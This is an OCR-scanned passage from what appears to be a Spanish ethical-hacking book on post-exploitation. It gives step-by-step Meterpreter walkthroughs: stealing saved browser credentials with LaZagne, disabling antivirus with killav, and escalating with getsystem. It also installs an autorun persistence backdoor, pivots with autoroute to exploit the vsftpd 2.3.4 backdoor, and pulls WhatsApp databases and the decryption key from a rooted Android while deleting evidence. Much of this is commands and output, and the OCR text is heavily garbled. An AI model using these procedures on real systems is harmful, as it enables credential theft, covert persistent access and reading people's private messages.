16 0.000005 192.168.14.83 172.217.114.174 yo? 1392 61973 - 443 Len=135 Y Form item: “password” zi "22ryu" 
11 9.090898 492, 168.1.83 172.217.411.174 UD? 1292 61973 + 443 Len=1333 
12 6.028620 192.168.1.£3 172.217.11.174 LDP 19% 61973 =~ 443 Ler=36 Key: passwor 
13 0.000085 162.245. 207.189 192.168.1.83 UD? 94 51735 — 58908 Len-52 
14 8.099992 172.237.412.474 192.168.1.83 vop 64 443 - 61973 Len=22 Value: 22ryu 
15 0.00698% 74.125, 195.169 192.168.1.83 vop 1392 443 - 53261 Len=1359 v : " on ” +e 
16 0.098065 74.125, 195.189 192.158,1,83 uDP 557 443 + 53261 Len=515 Form 1tem: login = Login 
17 0.080922 192.165.1.82 74.125.195,159 VDP 7153261 - 443 Len=29 à y 
16 0.568590 Yewore_be:d4:77 Veware_S3:d6;¢8 ARP 42 Who has 192.168.1.687 Tell 192,105,1,141 Key: login 
19 6, 600686 VYeware_53:b6;08 Yoware_herd4:77 ARP 69 192,168.1.68 15 at 99:60:29:53:b6:108 Y 1 ET a 
28 0.088402 172.217.11,174 192.166.1.83 LD? 352 443 -~ 61973 Lea=3i6 aiue: 208g1n 
71 0.000906 272.247.414.173 192.168, 1.83 oP 00 443 + 61973 Len=18 v : D a E” ma” 
22 0.000009  172.108.1.53 172.217. 14.174 A 72 61973 = 443 Len-38 Form item: “action” = “login 
38 RO + O O e ler do at ph bind Key: action 
28 SVE E ee oe PENS ter ee se SS. (EU, RA) SSeS een aa es 
25 0.009099 Veware_53:b6ic8 Vewars_be:d4:77 ARP 68 Who has 192.168,1,1317? Teli 192.165.4.68 Value: login 
26 4, 608089 Yiware_be:d4:77 Vavare_53:b5:08 ARP 42 192.168.1.141 $< ar 00:00:29:be:04:77 iT 
27 0.009886 492.168.1.83 192.168.1.187 TCP 171 38587 - 1068 [PSR, ACK] Seq=1 Ack=1 Win=254 Lens147 {TCP segment of a rease UA Y Form item: "new loc” = "" 
7A a aane 102-4671187 197. 168.184 TEP - 
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171 2869 = 38587 [PAK ACK) Sen=t ACK=118 Win=669 Lenati] [TCP senment_of a reis | | 
n i 
- — {HM 





Key: new_loc 








> Frame 4: 464 bytes on wire (3712 bits), 464 bytes captured (3712 bits) — | 
+ Ethernet 11, Sro: Shenzhen_4d;af:28 (d8:37:be:4d;af:28), Dst: Micro-St_7f;7f:ea (4c;cc:ba:7f:7F;8e) 
+ Internet Protocol Version 4, Sro: 197,168.1.254, Dst: 192.166.1.83 

» User Datagram Protocol, Sro Port: 49081, Dst Port: 56306 

+ Data (422 bytes) 


Value: 





Ac cc 6a 7f 7f ee de 37 be 4d af 28 88 00 45 60 Lj 


7M E 
Bi c2 89 99 40 99 49 11 b4 89 cB aS 01 fe c0 ab ' 








Packets. 2600 - Displayed: 2000 (100.0%) 


@7 sniffer.pcap 


Robo de credenciales de navegadores y | 


otros programas remotamente 


Aquí podremos ver desde que hizo la persona en Y 
Adicionalmente, una de las cosas que nos interesa 


cuanto a redes, hasta credenciales o archivos que i o 
| robar, serian las credenciales de distintos 


se hayan mandado sin estar encriptados. | 
| programas de un sistema, por ejemplo, 
| navegadores, apps (como Outlook), y credenciales 
de redes wifi, para hacer esto, podemos combinar 
nuestra conexión meterpreter con el programa 
| LaZagne, un script escrito en Python originalmente | 
| diseñado para uso forense, que está compilado 
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para Windows (también tiene versión para 
Macintosh y Linux) y lo podemos ejecutar 
remotamente. 

La limitante con este programa es que solo 
funciona con credenciales guardadas en el 
navegador, y no encriptadas (Windows no las 
encripta automáticamente, el usuario tendría que 
instalar un software adicional para ello, lo cual es 
poco común). 

Primero, ubiquemos el programa en nuestro 


sistema Kali, que está en la ruta 


lopt/Explotacion/lazagne/windows, y entraran a 


esa ruta con el comando cd. 
Podemos confirmar que está el programa con el 


comando ls. 
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A cd /opt/Explotacion/tazagne/windows/ 1| 


/opt/Explotacion, /\azagne/windows# ls 


NA. 


Ahora utilizaremos meterpreter para subirlo a el 


sistema comprometido con el comando upload. 
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Si el sistema en el que estas tiene antivirus, 
puedes deshabilitar manualmente cambiando el 
archivo de instalación del antivirus, o deshabilitar el 
de Windows con el módulo de post-explotación 
killav, puedes encontrarlo con el comando search. 


Ahora subiremos el ejecutable de LaZagne. 


oterpreter > HOE /opt/Explotacion/lazagne/windows/lazagne. exe 

uploading : /opt/Explotacion/lazagne/windows/lazagne.exe -> lazagne.exe 

Uploaded 8. 00 MiB of 17.58 MiB (45,51%): /opt/Explotacion/lazagne/windows/lazagne.exe -> 
TE ements 


Uploaded 16,00 MiB of 17.58 MiB (91.02%): /opt/Explotacion/lazagne/windows/lazagne.exe -> 
azagne Fox 
Uploaded 17,58 MiB of 17,58 MiB (100.0%); /opt/Explotacion/lazagne/windows/lazagne.exe -> 
| azagne, exe 
| 


uploaded: /opt/Explotacion/lazagne/windows/lazagne.exe -> lazagne.exe 
Una vez que esté en el sistema ya podemos 





utilizarlo, pero este programa se utiliza por medio 
de una consola de comandos, es decir, una shell, 
usaremos el comando shell para abrir una shell 

remota en el sistema. 


eterpreter > shell 
rocess 2476 created. 


Kannel 2 created, 
icrosoft Windows [Versión 6.1.7600] 
wright (c) 2009 Microsoft Corporation. Reservados todos los derechos. 


WWsers\WhiteSuit Hacking\Downloads>lf 
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Como puedes ver, ahora robó las credenciales de 


Ahora que ya tenemos una shell, ya podemos Facebook del navegador Chrome. 


ejecutar el programa, para hacerlo, basta con Podemos especificar exactamente qué queremos 


escribir lazagne.exe all, esto robará todas las robar del sistema con alguna de las opciones 





credenciales que encuentre en el sistema. adicionales de LaZagne. 


C:\Users\WhiteSuit Hacking\Downloads>lazagne. exe all 
lazagne,exe all 


I} 
i 
Ny lazagne.exe [-h] [--version] 

mat Bm sage: AI IA AE y 

Bie Ce lesa be | [chats,svn,all,w1f1,malls windows database, sysadmin, browsers, games} 


| BANG BANG |! 


hositional arguments: 
(chats,svn,all,wifi,mails,windows ,database, sysadmin, browsers, games} 
Choose a main command 
chats Run chats module 
svn Run svn module 
all Run all modules 
Password found !!! wifi Run wifi module 
Username: prueba@gmail.com Il mails Run mails module 
Password: contasenadechrome windows Run windows module 
Site: https://www. facebook. com/login. php | database Run database module 
| sysadmin Run sysadmin module 
browsers Run browsers module 
games Run games module 


ptional arguments: 
h, --help show this help message and exit 
--version laZagne version 
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meterpreter > run killav 


(*] Killing Antivirus services on the target... 
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Desactivar Antivirus varias técnicas obtener privilegios elevados en un 


sistema en el que tenemos privilegios nivel usuario. 


Para desactivar un antivirus en un sistema, existen 
Para usarlo, corre el comando getysystem en el 


varias formas dependiendo del antivirus, una de las 
meterpreter. 


formas más sencillas para desactivar uno es con el eterpreter > getsystem 
„got system via technique 1 (Named Pipe Impersonation (In Memory/Admin) ). 







comando run killav en meterpreter. 


Ahora podras confirmar que tienes privilegios 


[|] Meterpreter scripts are deprecated. Try mee y indewarmenede/ lav elevados con el comando getuid, en donde 


[!] Example: run post/windows/manage/killav OPTION=value [...] | 
| deberias aparecer como el usuario sistema. 


meterpreter > getuld 






Elevación de privilegios server username: NT AUTHORITY\SYSTEM 


Hay ocasiones en las que necesitamos realizar = ea : 
Elevación privilegios Android 


actividades en un sistema comprometido, como por | hi 
| La elevación de privilegios en Android es bastante 


ejemplo interactuar con partes del sistema no 
sencilla, basta con obtener una shell con la palabra 


accesibles para un usuario, así que podemos o 
| reservada shell, y luego pedir privilegios de 


utilizar tecnicas para obtener esta elevacion de | | 
| superusuario con la palabra clave su, recuerda que 


privilegios. | | | _ 
esto solo funciona si el Android tiene root. 


Getsystem 


La primera forma es la mas sencilla, aunque 


Channel 
SU 


altamente efectiva, que es usando el comando 





getsystem en un meterpreter, que intentara con 


498 499 

















Persistencia 


La persistencia es el utilizar el software malicioso 
en un sistema para generar un acceso perpetuo al 
sistema, sin importar si se reinicia este O si se 
cierra el proceso, hacer que el proceso 
simplemente se reinicie automáticamente. 

Para hacer esto, podemos utilizar scripts de 
persistencia para generar un ejecutable 
automáticamente al iniciar un sistema, sin 


embargo, usualmente requerimos un privilegio 


elevado, especialmente en sistemas como Android. 


Windows 


En Windows, es relativamente sencillo obtener 
persistencia en muchas versiones del sistema, 
utilizando el comando dentro de meterpreter run 
persistence, podemos utilizar diferentes banderas 
para elegir como generar la persistencia. 

Primero vamos a correr el comando run 
persistence -help para ver las opciones que 


tenemos. 


500 





a aa 


WHITE SUn| 





i WHITE SUIT 


meterpreter > run persistence -help 


[!] Meterpreter scripts are deprecated. T | 

| . Try post/windows/manage 
[1] Example: run post/windows/manage/persistence exe AER a — 
Meterpreter Script for creating a persistent backdoor on a target host 


OPTIONS; 


-A 
-IL 
A 
+S 
-T 
-U 
-X 
-h 


' i 
D E 


-T 








T da E R E aA explo1t/mult1/handler to connect to the agent 
es get hos to write payload to, if none %TEMP% will be used. 
p ayload to use, default is windows/meterpreter/reverse tc 
Automatically start the agent on boot as a service (with SVST zivi 5 
<opt> Alternate executable template to use l ay 
See cote start the agent when the User logs on 
utomatica star Lif g 
cH a, rt the agent when the system boots 
sopt> The interval in seconds between each connection attempt 
<opt> The port on which the system running Metasploit is listen 
<opt> The IP of the system running Metasploit listening for A back 


Aquí tenemos una explicación bastante decente de 
las opciones que podemos utilizar para la 
persistencia, recomiendo que leas estas opciones, 
pero las opciones que nos interesan en este 
momento serian la -A, para generar un escuchador 
al mismo tiempo, la -L, para decirle que se grabe 
en el disco duro del sistema principal el código 
malicioso, y la -X, para que cada vez que el 
sistema se prenda, nos dé una conexión, e intente 
hacer esa conexión cada 30 segundos, obviamente 
podríamos agregar otras opciones como agregar 
conexiones a otras máquinas, o que se inicie con 


que el usuario inicie sesión, pero por ahora estos 
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comandos son los principales, esto haría que el 


comando quede asi: 





run persistence -A -L c:\\ -X 30 





mst exploit ( 


Adicionalmente, si quisiéramos permisos elevados 






desde el inicio, le agregaríamos una -S. 


Name 
meterpreter > run persistence -A -L c:\\ -A 30 
[1] Meterpreter scripts are deprecated. Try post/windows/manage/persistence _ 
[1] Example; run post/windows/manage/persistence exe OPTION=value [,..] 
[+] Running Persistence Script 
[+] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-KAGNAUTILSB 20181016. 4404/WIN-KA6BNAUTILSB 
181016, 4404, rc 
[*] Creating Payload=windows/meterpreter/reverse tcp LHOST=192,168,1,68 LPORT=4444 
*] Persistent agent script is 99700 bytes tong 
Persistent Script written to c:\\zWYkjyZ.Vvos 
*] Starting connection handler at port 4444 for windows/meterpreter/reverse tcp 
+] exploit/multi/handler started! 
*] Executing script c:\\zWYKjyZ.vbs 
+] Agent executed with PID 2164 
Installing into autorun as HKLM\ Software\Microsoft\Windows\CurrentVersion\Run\ xT peclqsF 
Installed into autorun as HKLM\Software\Microsoft\windows\CurrentVersion\Run\XTpectqsF 


Listo, a este punto ya se ejecuto el script, pero 





realmente no ha funcionado, pero si esperamos un 





segundo, deberíamos obtener una sesión adicional, 





esa es la prueba de que se ejecuto correctamente, 











y funciono también correctamente el script. 
meterpreter > [*] Meterpreter session 13 opened (192,168,1,68:4444 -> 192,168.1,141:54342) at 2018-10-16 18:44:09 -05 


Vamos a probar si funciona el script reiniciando el 





sistema con el comando reboot. Tambien 





iniciaremos un escuchador en el puerto 4444 que 





es a donde apunta la persistencia. 
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meterpreter > reboot 
REbDOOting... 





Payload Payload opts 


_= A TAS 
n= DEZA pe 


Ahora que se inicie el sistema Windows. 


iniciando Windows 
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Y listo, ahora deberías tener una sesión de 
meterpreter automáticamente. 


\ > [*] Meterpreter session 19 opened (192.168.1,68:4444 -> 192.168. 1. 141:49167} at 2918-1011 


6 19:56:34 -0599 





Pivoteo - Atacando desde sistema 


comprometido 


Ahora vamos a aprender a “pivotear”, esto es | 
atacar un sistema por medio de un sistema 

comprometido. | 
Imagínate que quieres hackear a los directivos de 
la compañía X, sin embargo, en esta compañía, los 
directivos están altamente entrenados, así que un | 
ataque por ingenieria social no es viable, y estan 
tras una red protegida por un firewall, sin embargo, 
sabes que trabaja un becario como asistente de 
uno de estos ejecutivos, y que no esta bien 
entrenado, asi que logras obtener acceso al 
sistema del asistente. 

A pesar de que lograste un acceso, realmente no 
obtienes nada importante, ya que los archivos 


importantes estan en las maquinas, servidores, y 
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redes de la organización, así que tu única forma es 
utilizar a esta máquina infectada para atacar a los 


demás sistemas. 


Reconocimiento 


Para esta práctica asumimos que tienes un 
meterpreter en un sistema Windows (esto se puede 
hacer en otros SO, pero para el ejemplo utilizaré un 
sistema Windows comprometido). 

Vamos a seguir aplicando la metodología incluso 
en esta etapa de post explotación, lo primero que 
me interesa saber, es quien más, o que otros 
sistemas, son accesibles por mi sistema 
comprometido, es decir, mi “pivote” en la red. 


Para esto, lo primero que conviene hacer, es un 


escaneo ARP, por medio del script en Metasploit 


run arp_scanner al darle el parámetro -help, nos 


da las opciones que tenemos como argumentos. 
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meterpreter > run arp_scanner -help 


Meterpreter Script for performing an ARPS Scan Discovery, 


OPTIONS: 


-h Help menu. 
-1 Enumerate Local Interfaces 


-r <opt> The target address range or CIDR identifierlli«] 


-S Save found IP Addresses to logs. 


Ahora que tenemos los argumentos, vamos a 
utilizar el comando, run arp_scanner -r 
492.168.1.141/24, ya que 192.168.1.141 es la IP 
de la máquina infectada, y el /24 le dice que 
escanee todo el segmento de red. 

Tras este escaneo, sabremos cuantas, y cuales 
sistemas están conectados a la red, no sabemos 
realmente el tipo de sistema que es, pero mínimo 
ya tenemos visibilidad de cuantos sistemas existen 


en la red, sus IPs, y sus direcciones MAC. 
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Ahora, algo importante, es que estamos utilizando 


169. 
169, 
168. 
168. 
169. 
168. 


LOSIS 
168,1. 
169.1. 


168 
168 
168 
168 
168 
168 
168 
168 
168 


] 
il 
1 
1 
1 
1 
1 
1 
Il 
lly 
ad 
wh 
al 
ull 
val 
al 
ell 
sll 
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.68 MAC 00:0c:29: 
.73 MAC 30:07:4d: 
.83 MAC 4c:cc:6a: 
.79 MAC 08:05:81: 
93 MAC 70: AOS 





jeterpreter > run arp scanner -r 192.168.1.141/24 
| ARP Scanning 192.168.1.141/24 
| STEM TERE OEA 
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paquetes ARP porque son mas dificiles de detectar 


y pasan por un firewall mas facilmente, si intentaras 


hacer esto con por ejemplo nmap, probablemente 


no pasaria ningun paquete a la red. 
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Interceptando paquetes en redes externas del sistema comprometido, ahora, para de hecho 





interceptar y ver estos 
Normalmente es imposible realizar ataques de pary paquetes, basta con 





regresarnos a una lecció 
hombre en medio (MITM) en redes externas a la 9 ón anterior e instalar un 





| sniffer en el sistema com i 
nuestra, sin embargo, una vez que tenemos un ponca gogo y 
analizar el archivo en WireShark, con esto 





pivote (sistema comprometido) en la red, se nos 





hi Ea od i 
abre esta posibilidad utilizando la técnica de ‘ emos obtener que sistema es el que nos 
interesa atacar y que tipo de sistema es. 





envenenamiento ARP. 


en ven iui iu e 


Para hacer esto desde el pivote, utilizaremos el 











Regrésate a la lección de sniffer en post- 






explotación para hacer e 
comando run autoroute, puedes ver las opciones | P p SO. 


terpreter > run autoroute -sS 192.168.1.141/24 










si corres el comando con el argumento -help. 
1] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute, 


terpret fi t te -hel 
meterpreter > run autoroute -herp I] Example: run post /multi/manage/autoroute OPTION=value [...] 


“li neterpreter senipts are deprecated. (ry a LS Adding a route to 192. 168.1.141/255.255.255.0... 

[1] Example: run post /multi/manage/autoroute OPTION=value [...] | Added ro i 

«| Usage: run autoroute [-r] -5 subnet -n netmask dl Use He ute uE via 192.168.1.141 
SBE AT | -p option to list all active routes 


| 
| 
| 
} run autoroute -s5 10,1,1.0 -n 255.255.255.0 # Add a route to 10.10.10. 1/255.255.255.0 
| run autoroute -s 10,10.10.1 # Netmask defaults to 255.255.255.0 
“J 
1 


| 
| 
| 
[ $ 
| 
| 
| 


i run autoroute -S 10,10,10,1/24 # CIDR notation is also okay | : : 
run autoroute -p # print active routing table Genial, ahora no solo obtendras los paquetes de la 
FJ run autoroute -d -s 10,10.10,1 # Deletes the 10.10,10,1/255.255.255.0 route [| 


| Use the "route" and "ipconfig" Meterpreter commands to learn about avallable routes maquina comprometida si instalas un sniffer, si no 


Deprecation warning: This script has been replaced by the post/multi/manage/autoroute modi} 
los paquetes de toda la red. 





Como ya sabemos los segmentos de red que 


| m Atacando a otro sistema 
queremos interceptar, vamos a utilizarlos, con el 


comando run autoroute -S 492.168.1.141/24, esto Ahora, vamos a asumir que en tu análisis llegaste a 


hará que todos los paquetes pasen por la interfaz la conclusión que el sistema que quieres 
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comprometer tiene la IP 192.168.1.130 y es un Ahora inicia el ataque con el comando exploit, nota 


sistema Linux el cual esa versión en particular es 





como el ataque se está realizando a través del 


vulnerable a una falla en FTP. meterpreter en la sesión 1 (el pivote), esto te lo 


Vamos a atacarlo por el exploit en Metasploit, usa puede decir la terminal directamente con un *via 


el comando background, y el exploit para esta the meterpreter”, o al mostrarte las conexiones, que 


como podrás notar, tiene la conexión a mi IP (la 


68), a través de la IP del pivote (la 141). 


vulnerabilidad que se encuentra en: 
exploit/unix/ftp/vsftpd_234_backdoor 
Y configurarlo para atacar a la IP del objetivo. ST exploit ERAT 

















meterpreter > background 130:21 - Banner: 220 (vsFTPd 2.3.4) 
at - USER: 331 Please specify the password, 
1 


[*] Backgrounding session l., 
5 loit > ‘ee exploit/unix/ft vsftpd 234 backdoo I - Backdoor service has been spawned, handling... 
nsi SSR oi | P / / J PSE doo {| | 192.168.1.1 - UID: uid=0(root) gid=0(root) 


——— 


msf exploit ) > show options B) Found shell. 
| Command shell session 2 opened |(192.168.1. 68-192, 168.1. 141: @ -> 192,168.1.130:6200) at 2018-10-18 


Module options (exploit/unix/ftp/vsftpd_234 backdoor): | 33:12:15 0500 





Name Current Setting Required Description | Una vez en el sistema, ya podremos 


The target address comprometer la seguridad de la 





t t port (TCP . P ; 
iR A Thegtarget port Vrch) información, en este caso a través de 
una shell, pero si fuera un diferente 


Exploit target: l 
payload, bien pudo haber sido un 








Id Name meterpreter, o puedes pasar la shell a 


9 Automatic meterpreter como vimos hace unas 


páginas. 





msf exploit ( \ > set RHOST 192.168.1. 130 
RHOST => 192.168.1.130 
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Hackeando WhatsApp 


Hackear WhatsApp de un Android, aunque bien es 
posible, no es del todo fácil, para hacer esto, 
primero tenemos que entender una cosa, no 
estamos hackeando WhatsApp, lo que estamos 
hackeando realmente es el respaldo de las 
conversaciones que hace WhatsApp, y, aunque 
bien estas están encriptadas en el celular con el 
protocolo (al momento) crypt12, existe una forma 
de obtener la llave, ya que se guarda en el mismo 
dispositivo, sin embargo, para obtener esta llave, 
necesitamos un acceso root. 

Aun así, esto solo es necesario con las 


conversaciones, ya que los archivos y multimedia 





como fotos, imágenes y audios, se almacenan sin 
ningún tipo de encriptación. 

Primero, vamos a descargar archivos de WhatsApp 
que no están encriptados, para esto, vete a la 
carpeta donde esta almacenado WhatsApp, por 


defecto está en Isdcard/WhatsApp. 
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'eterpreter E 


eterpreter > pwd 


etrterprerer 


storage/emu 





eterpreter > ls 
isting: /storage/emulated/legacy/WhatsApp 


A o e cn a e e o e rr 


1667/rw-rw-rwx 4096 din 
1667/rw-rw-=rwx 4096 dir 
1666/rw-rw-rw- 4096 dir 
N666/rw-rw-rw- 4096 dir 















Y con Is podemos ver las distintas carpetas en este 
directorio, por el momento, seleccionaremos la de 


Media, luego regresaremos a la otra. 


— 
A A e ee SS SS a Á e e e 


Size Name 


2018-07-29 23:46:39 -0500 
2018-10-16 22:04:42 -0500 


Como podrás notar, dentro de la carpeta de Media 
hay varias carpetas referentes a imágenes y demás 


archivos multimedia. 
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/sdcard/WhatsApp 


Lated/legacy/WhatsApp 





¿Shared 
¿trash 
2018-10-16 02:00:00 -0500 Databases 
2018-02-10 11:11:18 -0600 Media 








A A A Se SS Ee = 
PP a ara as cae Se a a SO a 

































meterpreter > cd Media 


meterpreter > ls 
Listing: 7storage/enulated/Legacy/WhatsApp/Media 


eee er SS SS SS SSS == 
<== SSS o = e 


Name 
rw- FWX 2018-10-12 00:00:07 -0500 Statuses 
- FW- rW- dir 2017-10-27 20:35:25 -0500 WallPaper 
J- rW- rW- dir 2018-07-30 01:15:29 -0500 WhatsApp Animated Gifs | 
- FW- FW- dir 2018-07-30 01:50:18 -0500 WhatsApp Audio 
W- rW- rW- dir 2018-07-30 02:02:12 -0500 WhatsApp Documents 
W- rW- rW- dir 2018-07-30 01:57:16 -0500 WhatsApp Images 
W- rW- TW- dir 2017-10-27 20:35:25 -0500 WhatsApp Profile Photos 


pl 


40666/1W-1W-1W- dir 2018-02-10 11:11:18 -0600 WhatsApp Stickers 
40666/rw-rw-rw- 20480 dir 2018-07-30 01:59:11 -0500 WhatsApp Video 
40666/rw-rw-rw- 4096 dir 2018-07-29 23:39:30 -0500 WhatsApp Voice Notes 


Digamos que queremos descargar una Imagen, 
basta con ir a la carpeta WhatsApp Images con cd 
“WhatsApp Images”, y elegir la imagen a 
descargar. 

*nota: Las comillas son necesarios al ingresar a 


una carpeta con un espacio entre de dos palabras. 


meterpreter > cd "WhatsApp Images” 
meterpreter > ls 








Listing: /storage/enulated/Legacy/WhatsApp/Media/WhatsApP Images 


A A AA A A So 
=< SS SS eee 


AA A ee 
SS A OS 


Size Type 


100666/rw-rw-rw- 258972 fil 2018-07-30 01:57:16 -0500 IMG-20150411-WA0011.)p0 
100666/rw-rw-rw- 88397 fil 2018-07-30 01:56:52 -0500 IMG-20150429-WA0014. JPY 
100666/rw-rw-rw- 55601 fil 2018-07-30 01:56:11 -0500 IMG-20150602-WA0003. }p° 


514 





WHITE SUIT | 


' 


ieterpreter > download IMG-20150411-WA0011.3pg 
| Downloading: IMG-20150411-WA0011.]pg -> ING-20150411-WAO011. jpg 
I Downloaded 252.90 KiB of 252.90 KiB (100.0%): IMG-20150411-WADO11. j 
2 0%) | jpg -> IMG-20150411-WA0011, 
download : IMG-20150411-WA0011.Jpg -> IMG-20150411-WA0011, Jpg i 


a I 








PIE 


Ahora, para descargar cualquier imagen, solo usa 
el comando download seguido del nombre de la 


imagen. 





Seguido de esto, la imagen se habrá descargado 


en tu sistema. 





Ahora viene lo difícil, las conversaciones, para 
esto, vas a regresar a la carpeta WhatsApp, y 
ahora ingresar a la carpeta Databases. 

Aquí están todos los respaldos de WhatsApp del 
sistema, sin embargo, como notaras, tienen la 
terminación crypt12, nos encargaremos de eso 
luego, por ahora, descarga el archivo con el 


comando download. 
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meterpreter > pwa 


/storage/emulated/legacy/WhatsApp 


meterpreter > cd Databases 


meterpreter > ls 


Listing: /storage/emulated/legacy/WhatsApp/Databases 


100666/ rw- rv 
100666/ rw- 

100666/ rw- rv 
100666/ rw- rv 
100666/ rW- m 
100666 / rw- rr 


115048 
115048 
115047 
115049 
115046 
115047 


2018-10-08 02:00:00 
2018-10-09 02:00:00 
2018-10-10 02:00:00 
2018-10-11 02:00:00 
2018-10-15 02:00:00 
2018-10-16 02:00:00 


meterpreter > download msgstore,db.crypt12 
[+] Downloading: msgstore.db.crypt12 -> msgstore. db 


[*] Downloaded 112,35 KiB of 112.35 KiB (100,0%); 
: msgstore.db.crypt12 -> msgstore.db.crypt12 


PF] download 


-0500 
051010) 
-0500 
-0500 
-0500 
-0500 


‚Crypt12 
msgstore,db.cryptl2 -> msgstore.db, crypt]? 
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Name 


msgstore-2018-10-09.1.db.crypt1> 
msgstore-2018-10-10.1.db.crypt1> 
msgstore-2018-10-11,1,db.crypt1> 
msgstore-2018-10-15.1.db.crypt12 
msgstore-2018-10-16,1.db.crypt1> 
msastore,db,crypt12 


Ahora, viene lo difícil, primero, confirmamos que 


estamos en un celular con root, para esto, 


correremos el comando check_root. 


meterpreter > check root 





[+] Device is rooted 


Si no está rooteado, no podrás obtener acceso a la 


llave, ahí tienes dos opciones, o encuentras forma 


de obtener root, ya sea con un exploit o ingeniería 


social, o atacas a algún sistema en la nube como 


¡Cloud o Google drive donde esté el respaldo. 


Como el sistema está rooteado, proseguiremos, 


vamos a obtener una shell con dicho comando, 
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una vez en la shell, pediremos permiso de 


superusuario con el comando su. 


meterpreter > shell 
Process 8 created. 





Channel 13 created. 
| su 





| Ahora, a buscar la llave, por defecto, está guardada 


en la carpeta /data/data/files/com.whatsapp/files/ 


lcd /data/data/com.whatsapp/files/ 
ls’ 


Ahora, viendo los archivos WAR IAS 
con ls, podemos notar Log S 


que aquí esta lo que invalid numbers 

buscamos, el archivo key. key J 
login failed 
me 


me .J pg 











Be? 
Statistics 
wam.wam 
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Sin embargo, no podemos descargar nada desde eterpreter > pwd 
ctorage/emulated/legacy/WhatsApp 
una shell, y no podemos acceder a ese directorio lloterpreter > ls 


- isting: /storage/emulated/legacy/WhatsApp 
desde un meterpreter, asi que tendremos que | 


copiar la llave a un directorio publico con el Name 
comando cp, en este caso lo copie al directorio de M T many Ge 018 07-29 23:46:39 PT 
WhatsApp. M0667 / rw- rw- rwx ir 2018-10-16 22:04:42 trash 
tio da e 
Cp Key /sdca ra/WhatsApp/ i ne | 2018-10-16 22:33:30 key 
Ya no necesitamos shell, ingresemos a meterpreter MN oterpreter > download key 
cerrando la shell con control + z. | aoed 158,80 $ of 158,00 B (100.0%): key 


| download : key -> key 
meterpreter > rm key 





C 





Terminate channel 13? [y/N] y 





Ahora sí, ya tenemos tanto la base de datos, como 


la llave para desencriptarla, ahora vamos a 


Ahora, nos iremos al directorio donde está la llave, l , i ; 
desencriptarla, para esto existen varias opciones 


y la descargamos con el comando download, y : 
decentemente sencillas. 


posteriormente eliminaremos la llave para borrar E 
La primera, si es una base de datos pequeña, es 


evidencia con el comando rm. 
http://whatcrypt.com , directamente en la página, 
y si es una base de datos más grande, descarga la 
| app en tu Android, sube los dos archivos en tu 
Android, y simplemente sube la base de datos y la 


llave al directorio. 
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Decrypt WhatsApp Database 


WhatCrynt 
Encrypted Database Path: 
Istorage/emulated/0/WhatsApp/Databases/msgstore-201 8-07-30.1.db.crypt12 


Gmail Account (Crypt 5): 


Key File Path (Crypt 6>12): 


/sdeard/WhatsApp/key 


Decrypt Database 


Otra alternativa que encuentro mas comoda es 


usar WhatsApp Viewer, que puedes encontrar en 


https://whitesuithacking.com/material-libro oen 
su repositorio en GitHub buscandolo con dicho 


nombre. 
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Open WhatsApp Database 


Account name 
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Posteriormente, sea la herramienta que sea que 
uses, obtendrás un archivo .db, eso significa que 
ya podrás visualizar la base de datos en cualquier 
visualizador compatible, recomiendo WhatsApp 
Viewer de nuevo, ya que lo ordena en una interfaz 
amigable, sin embargo, existen otros programas 
que podrían manejar estos archivos. 


Para abrir el archivo, simplemente haz clic en 





“File”, “Open...”, y selecciona la base de datos. 




















> tet hiv ,. zot Total message count j 
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Y ahora te mostrará los contenidos en una manera 


organizada y amigable. 


© WhatsApp Viewer 


File Help 





A —— a NIG 


2013.03.13 


2013.04 21 
Hola 
Hey 4 
Que onda como andas? 
2013.04 22 
feed 
Doae 
fears 
E 
evs 
vi: Export .txt.. = Export html F 
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Forense 


Aunque este libro no es uno enfocado en 
informatica forense, pienso que vale la pena hablar 
un poco al respecto tan solo para entender la 
metodologia y la importancia de esta para la 
continuidad de un negocio, asi que tocare el tema 
de informatica forense, su metodologia, y una 


practica con una herramienta para esto. 


Metodologia 


La metodologia de la informatica forense tiene que 
ser llevada muy estructurada, pero en si, es 
decentemente sencilla, lo importante aqui es que 
para recopilar evidencias confiables y admisibles 
legalmente hablando, se tiene que llevar una 
cadena de custodia muy estructurada de por 
donde paso la informacion, como se obtuvo, que 
cambios se hicieron, quien tuvo acceso a esta, y 
donde se almaceno. 


Tomando en cuenta lo anterior, los pasos son: 
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4. Identificar la evidencia: En este paso se 


llega a la “escena” y se identifica que es 


evidencia y que no lo es. 


2. Adquisición de la evidencia: En este 


punto, un equipo de informática forense 


empezaría a tomar la evidencia, digase fotos 


del sistema, como esta actualmente, 
transportar los dispositivos, nota, en este 
paso es muy importante que ninguna 
evidencia sea contaminada O modificada, 
por ejemplo, si se encuentra un sistema 
prendido y conectado, se buscaría en ese 
momento tomar la evidencia digital, por 
ejemplo, registros, copias de disco, etc, sin 
que se apague o haga cualquier cambio 
importante a la máquina. Incluso se tiene 
que documentar que herramienta se utilizó 
para recopilar la información ya que toda 


herramienta deja su propia “huella”. 


Preservación de la evidencia: Típicamente 


se sacan copias dobles de los discos e 
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imágenes que se obtengan de una 


información o evidencia sensible. 


- Análisis de la evidencia: En este punto es 


donde se obtiene información real de la 
evidencia, como que se hizo a qué tiempo, 
quien modificó algún sistema, de donde, 
etc., todo tiene que ser estrictamente 
documentado, tanto de cómo se obtuvo, 
como exactamente que muestra. 
Presentación del informe: Aquí es reportar 
todo lo obtenido y la metodología que se 
llevó, así como un registro (la cadena de 
custodia) que muestre quien tuvo acceso y 
que se modifica de la información. Aquí el 
trabajo del forense NO es sacar 
conclusiones de porqué se hizo algo, o ni 
siquiera quien, solo los hechos deben de ser 


presentados. 
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Evaluación de la situación 





Devolución de la evidencia / Fin 


Práctica - Windows 


Para esta práctica, utilizaremos DAWF, una 
herramienta forense para Windows bastante 
sencilla, esta no está diseñada para actividades en 
las que la evidencia tenga que ser utilizada por la 


policía, sin embargo, es una herramienta útil y 
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sencilla de utilizar para obtener cierta información 
como registros de un sistema. 

Adicionalmente, cabe mencionar que DAWF 
realmente no hace nada más que automatizar 
ciertos procesos para recopilar información, así que 
es una herramienta muy básica. 

Para descargarla, entren a 

https: //whitesuithacking.com/material-libro y 
hagan clic en el botón que dice DAWF, luego de 
eso, descomprime el archivo .zip, y obtendrás una 
carpeta similar a la siguiente. 


Nota: muchos antivirus detectan la herramienta 
como maliciosa, esto es por la naturaleza de la 
herramienta, no está hecha para ataques y evasión 
de antivirus, sin embargo, es inofensiva. 





Evidencias Herramientas COMCTL3Z.OCX  DAWF.exe 
